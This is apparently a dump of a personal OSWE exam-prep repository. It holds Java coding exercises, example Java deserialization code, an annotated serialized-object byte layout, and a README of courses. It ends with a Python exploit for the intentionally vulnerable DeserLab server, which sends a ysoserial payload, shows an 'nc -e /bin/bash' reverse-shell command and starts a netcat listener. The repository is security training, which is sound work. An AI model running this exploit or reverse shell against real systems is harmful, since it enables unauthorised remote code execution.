12 | 47844,7709,54 # Client tells server to prepare for TC_BLOCKDATA of 0x09 bytes
13 | 47844,,54 # Client sends server client name, along with length of name
14 | 47844,,54 # Client sends server string to be hashed
15 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a single string as argument and returns
4 | an ordered array containing the indexes of all capital letters in
5 | the string.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
11 | public class Program
12 | {
13 | public static int[] indexOfCaps(String s)
14 | {
15 | char[] arr = s.toCharArray();
16 | int ct = 0;
17 | int i = 0;
18 |
19 | for (i = 0; i < arr.length; i++)
20 | if (Character.isUpperCase(arr[i]))
21 | ct++;
22 | int d_arr[] = new int[ct];
23 |
24 | i = 0;
25 | for (int j = 0; j < arr.length; j++)
26 | if (Character.isUpperCase(arr[j]))
27 | d_arr[i++] = j;
28 |
29 | return d_arr;
30 | }
31 |
32 | public static void main(String[] args)
33 | {
34 | System.out.println(Arrays.toString(indexOfCaps("eDaBiT")));
35 | System.out.println(Arrays.toString(indexOfCaps("eQuINoX")));
36 | System.out.println(Arrays.toString(indexOfCaps("determine")));
37 | System.out.println(Arrays.toString(indexOfCaps("STRIKE")));
38 | System.out.println(Arrays.toString(indexOfCaps("sUn")));
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-eight.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts an array of two strings and checks if
4 | the letters in the second string are present in the first string.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
10 | public class Program
11 | {
12 | // matchesCount: count occurences of char c in String str1
13 | public static int matchesCount (String str1, char c)
14 | {
15 | int count = 0;
16 | for (int i = 0; i < str1.length(); i++)
17 | if (str1.toLowerCase().charAt(i) == c)
18 | count++;
19 | return count;
20 | }
21 |
22 | public static boolean letterCheck(String[] s)
23 | {
24 | char ng[] = s[1].toLowerCase().toCharArray();
25 | int ct = 0;
26 |
27 | for (int j = 0; j < ng.length; j++)
28 | if (matchesCount(s[0].toLowerCase(), ng[j]) >= 1)
29 | ct++;
30 | return (ct == ng.length) ? true : false;
31 | }
32 |
33 | public static void main(String[] args)
34 | {
35 | System.out.printf("%b\n", letterCheck(new String[]{"trances", "nectar"}));
36 | System.out.printf("%b\n", letterCheck(new String[]{"compadres", "DRAPES"}));
37 | System.out.printf("%b\n", letterCheck(new String[]{"parses", "parsecs"}));
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/Edabit/java/sixteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Christmas Eve is almost upon us, so naturally we need to prepare
4 | some milk and cookies for Santa! Create a method that accepts a
5 | GregorianCalendar object and returns true if it's Christmas Eve
6 | (December 24th) and false otherwise.
7 |
8 | Note:
9 | could have just compared to return val for example 11...
10 |
11 | */
12 |
13 | import java.util.GregorianCalendar;
14 |
15 | public class Program
16 | {
17 | public static boolean timeForMilkAndCookies(GregorianCalendar date)
18 | {
19 | GregorianCalendar daTime = new GregorianCalendar(2013, 11, 24);
20 |
21 | return (
22 | daTime.get(daTime.DATE) == date.get(date.DATE) &&
23 | daTime.get(daTime.MONTH) == date.get(date.MONTH)
24 | );
25 | }
26 |
27 | public static void main(String[] args)
28 | {
29 | GregorianCalendar ac = new GregorianCalendar(2013, 11, 24);
30 | GregorianCalendar bc = new GregorianCalendar(2013, 0, 23);
31 | GregorianCalendar cc = new GregorianCalendar(3000, 11, 24);
32 |
33 | System.out.printf("%b\n", timeForMilkAndCookies(ac));
34 | System.out.printf("%b\n", timeForMilkAndCookies(bc));
35 | System.out.printf("%b\n", timeForMilkAndCookies(cc));
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Edabit/java/thirty.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts a string of space separated numbers
4 | and returns the highest and lowest number (as a string).
5 |
6 | */
7 |
8 | import java.util.*;
9 |
10 | public class Program
11 | {
12 | public static int minVal(int[] nums)
13 | {
14 | int min = nums[0];
15 |
16 | for (int i = 0; i < nums.length; i++)
17 | if (nums[i] < min)
18 | min = nums[i];
19 | return min;
20 | }
21 | public static int maxVal(int[] nums)
22 | {
23 | int max = nums[0];
24 |
25 | for (int i = 0; i < nums.length; i++)
26 | if (nums[i] > max)
27 | max = nums[i];
28 | return max;
29 | }
30 | public static String highLow(String s)
31 | {
32 | String[] arr = s.split(" ");
33 | int[] narr = new int[arr.length];
34 |
35 | for (int i = 0; i < narr.length; i++)
36 | narr[i] = Integer.parseInt(arr[i]);
37 |
38 | return String.format("%s %s", maxVal(narr), minVal(narr));
39 | }
40 | public static void main(String[] args)
41 | {
42 | System.out.printf("%s\n", highLow("1 2 3 4 5"));
43 | System.out.printf("%s\n", highLow("1 2 -3 4 5"));
44 | System.out.printf("%s\n", highLow("1 9 3 4 -5"));
45 | System.out.printf("%s\n", highLow("13"));
46 | }
47 |
48 | }
49 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-nine.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of doubles and returns the following statistics:
4 | - min val
5 | - max val
6 | - len val
7 | - avg val
8 |
9 | */
10 |
11 | import java.util.*;
12 |
13 | public class Program
14 | {
15 | public static double minVal(double[] nums)
16 | {
17 | double min = nums[0];
18 |
19 | for (int i = 0; i < nums.length; i++)
20 | if (nums[i] < min)
21 | min = nums[i];
22 | return min;
23 | }
24 |
25 | public static double maxVal(double[] nums)
26 | {
27 | double max = nums[0];
28 |
29 | for (int i = 0; i < nums.length; i++)
30 | if (nums[i] > max)
31 | max = nums[i];
32 | return max;
33 | }
34 |
35 | public static double avgVal(double[] nums)
36 | {
37 | double avg = 0;
38 |
39 | for (int i = 0; i < nums.length; i++)
40 | avg += nums[i];
41 | return (avg / nums.length);
42 | }
43 |
44 | public static double[] minMaxLengthAverage(double[] nums)
45 | {
46 | return new double[]{minVal(nums), maxVal(nums), nums.length, avgVal(nums)};
47 | }
48 |
49 | public static void main(String[] args)
50 | {
51 | System.out.printf("%s\n",
52 | Arrays.toString(minMaxLengthAverage(new double[]{6, 9, 15, -2, 92, 11}))
53 | );
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/Utils.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | class Utils
4 | {
5 | // function to serialize an object and write it to a file
6 | public static void SerializeToFile(Object obj, String filename)
7 | {
8 | try
9 | {
10 | FileOutputStream file = new FileOutputStream(filename);
11 | ObjectOutputStream out = new ObjectOutputStream(file);
12 |
13 | // serialization of the object to file
14 | System.out.printf("Serializing %s to %s\n",
15 | obj.toString(), filename
16 | );
17 | out.writeObject(obj);
18 |
19 | out.close();
20 | file.close();
21 | }
22 | catch (Exception e)
23 | {
24 | System.out.printf("Exception: %s\n", e.toString());
25 | }
26 | }
27 | // function to deserialize an object from a file
28 | public static Object DeserializeFromFile(String filename)
29 | {
30 | Object obj = new Object();
31 |
32 | try
33 | {
34 | FileInputStream file = new FileInputStream(filename);
35 | ObjectInputStream in = new ObjectInputStream(file);
36 |
37 | // deserialization of the object to file
38 | System.out.printf("Deserializing from %s\n", filename);
39 | obj = in.readObject();
40 |
41 | in.close();
42 | file.close();
43 | }
44 | catch (Exception e)
45 | {
46 | System.out.printf("Exception: %s\n", e.toString());
47 | }
48 |
49 | return obj;
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/Utils.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | class Utils
4 | {
5 | // function to serialize an object and write it to a file
6 | public static void SerializeToFile(Object obj, String filename)
7 | {
8 | try
9 | {
10 | FileOutputStream file = new FileOutputStream(filename);
11 | ObjectOutputStream out = new ObjectOutputStream(file);
12 |
13 | // serialization of the object to file
14 | System.out.printf("Serializing %s to %s\n",
15 | obj.toString(), filename
16 | );
17 | out.writeObject(obj);
18 |
19 | out.close();
20 | file.close();
21 | }
22 | catch (Exception e)
23 | {
24 | System.out.printf("Exception: %s\n", e.toString());
25 | }
26 | }
27 | // function to deserialize an object from a file
28 | public static Object DeserializeFromFile(String filename)
29 | {
30 | Object obj = new Object();
31 |
32 | try
33 | {
34 | FileInputStream file = new FileInputStream(filename);
35 | ObjectInputStream in = new ObjectInputStream(file);
36 |
37 | // deserialization of the object to file
38 | System.out.printf("Deserializing from %s\n", filename);
39 | obj = in.readObject();
40 |
41 | in.close();
42 | file.close();
43 | }
44 | catch (Exception e)
45 | {
46 | System.out.printf("Exception: %s\n", e.toString());
47 | }
48 |
49 | return obj;
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task19-multi_level_parsing.js:
--------------------------------------------------------------------------------
1 |
57 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/reversed-bytes.c:
--------------------------------------------------------------------------------
1 | // obtained from: https://docs.oracle.com/javase/7/docs/api/constant-values.html
2 | \xac\xed // -> Magic number identifying this is serialized data
3 | \x00\x05 // -> Protocol Version
4 | \x73 // -> we have a new object (TC_OBJECT)
5 | \x72 // -> Class description (TC_CLASSDESC)
6 | \x00\x07 // -> Length of class name
7 | \x4c\x6f\x67\x46\x69\x6c\x65 // -> Class name: LogFile
8 | \xd7\x60\x3d\xd7\x33\x3e\xbc\xd1 // -> Serial version UID: This is an identifier of the
9 | // class. This value can be specified in the class,
10 | // if not, it is generated automatically
11 | \x02 // -> Flag: class is serializable (SC_SERIALIZABLE)
12 | \x00\x02 // -> Number of variables in class
13 | \x4c // -> Type code/signature - class
14 | \x00\x0b // -> Length of the class variable: 11
15 | \x66\x69\x6c\x65\x63\x6f // -> Variable name: filecontent
16 | \x6e\x74\x65\x6e\x74
17 | \x74 // -> A string (TC_STRING)
18 | \x00\x12 // -> Length of class name
19 | \x4c\x6a\x61\x76\x61\x2f // -> Class name: Ljava/lang/String;
20 | \x6c\x61\x6e\x67\x2f\x53
21 | \x74\x72\x69\x6e\x67\x3b
22 | \x4c // -> Type code/signature - class
23 | \x00\x08 // -> Length of the class variable: 8
24 | \x66\x69\x6c\x65\x6e\x61\x6d\x65 // -> Variable name: filename
25 | \x71 // -> Refrence to previous object (TC_REFERENCE)
26 | \x00\x7e\x00\x01 // -> Object reference ID. Refrenced objects start
27 | // from 0x7E0000
28 | \x78 // -> End of block data for this object (TC_ENDBLOCKDATA)
29 | \x70 // -> NULL reference, we finished the "class description"
30 | // the data fill follow
31 | \x74 // -> A string (TC_STRING)
32 | \x00\x11 // -> Length of string: 17
33 | \x4e\x6f\x20\x61\x63\x74\x69 // -> The string: "No actions logged"
34 | \x6f\x6e\x73\x20\x6c\x6f\x67
35 | \x67\x65\x64
36 | \x74 // -> A string (TC_STRING)
37 | \x00\x0b // -> Length of string: 17
38 | \x77\x65\x74\x77\x30\x72 // -> The string: "wetw0rk.log"
39 | \x6b\x2e\x6c\x6f\x67
40 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AWAE PREP Layout
2 |
3 | This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and varous courses. Below you can see in what order I completed these challenges / courses.
4 |
5 | ## Prep Breakdown
6 |
7 | The following table shows notes, courses, challenges, and tutorials taken in preparation for the AWAE.
8 |
9 | | Order | Name | Type | Link |
10 | |--- | --- | --- | --- |
11 | | 1 | JavaScript For Pentesters | Course | https://www.pentesteracademy.com/course?id=11 |
12 | | 2 | Edabit (Javascript, Java, PHP) | Challenges | https://edabit.com/ |
13 | | 3 | Simple Object Oriented Language Examples | Notes | N/A (I just wrote simple templates)
14 | | 4 | From SQL Injection to Shell | Tutorial | https://pentesterlab.com/exercises/from_sqli_to_shell/ |
15 | | 5 | XSS and MySQL | Challenge | https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ |
16 | | 6 | Understanding PHP Object Injection | Tutorial | https://securitycafe.ro/2015/01/05/understanding-php-object-injection/ |
17 | | 7 | /dev/random: Pipe | Challenge | https://www.vulnhub.com/entry/devrandom-pipe,124/ |
18 | | 8 | Understanding Java Deserialization | Tutorial | https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
19 | | 9 | Practicing Java Deserialization Exploits | Challenge/Tutorial | https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/ |
20 | | 10 | SQL Injection Attacks and Defense | Book | https://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597499633 |
21 |
22 | ## Post Prep Breakdown
23 |
24 | Having completed the course, below is everything done in regards to prep before the exam. If you have not taken the AWAE and are considering taking it definitely do everything shown above, and read the source! I have provided README's in each directory and source code so you can see what I did. I cannot share extra miles .... so those will not be within the repository. Best of luck!
25 |
26 | - Complete all extra miles! I know some are harder than others but push through (one took me 8 days alone).
27 | - Be comfortable using every debugger shown within the course.
28 | - Understand Object Oriented Languages taught throughout the course. No need to be a master in each language, but be able to code something fast using existing libs.
29 | - Be comfortable crafting a full POC (as done throughout the entire course)
30 | - Look for vulnerabilities ;)
31 |
32 | This may not seem like much, but it's what I did for prep. My best advice is DO NOT OVERTHINK things and don't rush through it. It took me 2 attempts when it should have taken one, I was jumping around not documenting enough what I was trying (It's easy to create your own rabbit holes...). Slow down you have 48 hours!
33 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/exploit.py:
--------------------------------------------------------------------------------
1 | #/usr/bin/env python
2 | #
3 | # Exploit Title : Practicing Java Deserialization Exploits
4 | # Author : wetw0rk
5 | # Vulnerable Software : https://github.com/NickstaDB/DeserLab
6 | #
7 | # Usage : DeserLab is an intentionally vulnerable server that
8 | # is vulnerable to java deserialization. This exploit
9 | # leverages the vulnerability within the application.
10 | #
11 |
12 | import os
13 | import sys
14 | import socket
15 | import struct
16 |
17 | class serial_killer():
18 |
19 | def __init__(self, rhost, rport):
20 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 | self.rhost = rhost
22 | self.rport = int(rport)
23 |
24 | def connect(self):
25 | '''
26 | Connect to the server and specify data sent will be serialized
27 | '''
28 | self.sock.connect((self.rhost, self.rport))
29 | self.sock.sendall(
30 | '\xac\xed' # STREAM_MAGIC
31 | '\x00\x05' # STREAM_VERSION
32 | )
33 | print("[*] Got STREAM_MAGIC, and STREAM_VERSION: %s" %
34 | self.sock.recv(4).encode('hex'))
35 |
36 | # start normal traffic
37 | self.send_hello()
38 | self.send_version()
39 | self.send_name()
40 |
41 | def send_hello(self):
42 | '''
43 | We know based on the PCAP gathered to expect bytes 0x77, 0x04.
44 | Here we unpack byte as an `unsigned integer` and remove ','.
45 | Based on 0x04 (and wireshark) we should get 0xf000baaa
46 | '''
47 | pkt = self.sock.recv(2) # \x77\x04
48 | datalength = int(struct.unpack('B', pkt[1])[0])
49 | print("[*] Getting TC_BLOCKDATA (you had me at hello): %s" %
50 | self.sock.recv(datalength).encode('hex'))
51 |
52 | self.sock.sendall(
53 | '\x77' # TC_BLOCKDATA
54 | '\x04' # Length: 0x04
55 | '\xf0\x00\xba\xaa' # Contents: 0xf000baaa
56 | )
57 |
58 | def send_version(self):
59 | '''
60 | Once we recieve the server version we send our client version
61 | '''
62 | pkt = self.sock.recv(2)
63 | datalength = int(struct.unpack('B', pkt[1])[0])
64 | print("[*] More TC_BLOCKDATA (version from server): %s" %
65 | self.sock.recv(datalength).encode('hex'))
66 |
67 | self.sock.sendall(
68 | '\x77' # TC_BLOCKDATA
69 | '\x02' # Length: 0x02
70 | '\x01\x01' # Contents: 0x0101
71 | )
72 |
73 | def send_name(self):
74 | '''
75 | With the client version send, we now send our client name
76 | '''
77 | print "[*] Sending TC_BLOCKDATA (our name)"
78 | self.sock.sendall(
79 | '\x77' # TC_BLOCKDATA
80 | '\x09' # Length: 0x09
81 | '\x00\x07' # Length: 0x07
82 | 'wetw0rk' # wetw0rk == 7 bytes
83 | )
84 |
85 | # java -jar ysoserial.jar Groovy1 'nc -e /bin/bash 127.0.0.1 12' > payload.bin
86 | def exploit(self, payload_file):
87 | '''
88 | With our client name sent, we send a string to hash, only
89 | this time we will send our payload
90 | '''
91 | payload = ""
92 | with open(payload_file, 'rb') as content_file:
93 | payload = content_file.read()
94 |
95 | self.sock.sendall(payload[4:])
96 | print "[+] Exploitation was a SUCC-ess, payload triggered"
97 | os.system("nc -lp 12")
98 |
99 | try:
100 | target = sys.argv[1]
101 | port = sys.argv[2]
102 | payloadf= sys.argv[3]
103 | except:
104 | print "Usage ./%s " % sys.argv[0]
105 | exit()
106 |
107 | start = serial_killer(target, port)
108 | start.connect()
109 | start.exploit(payloadf)
110 |
--------------------------------------------------------------------------------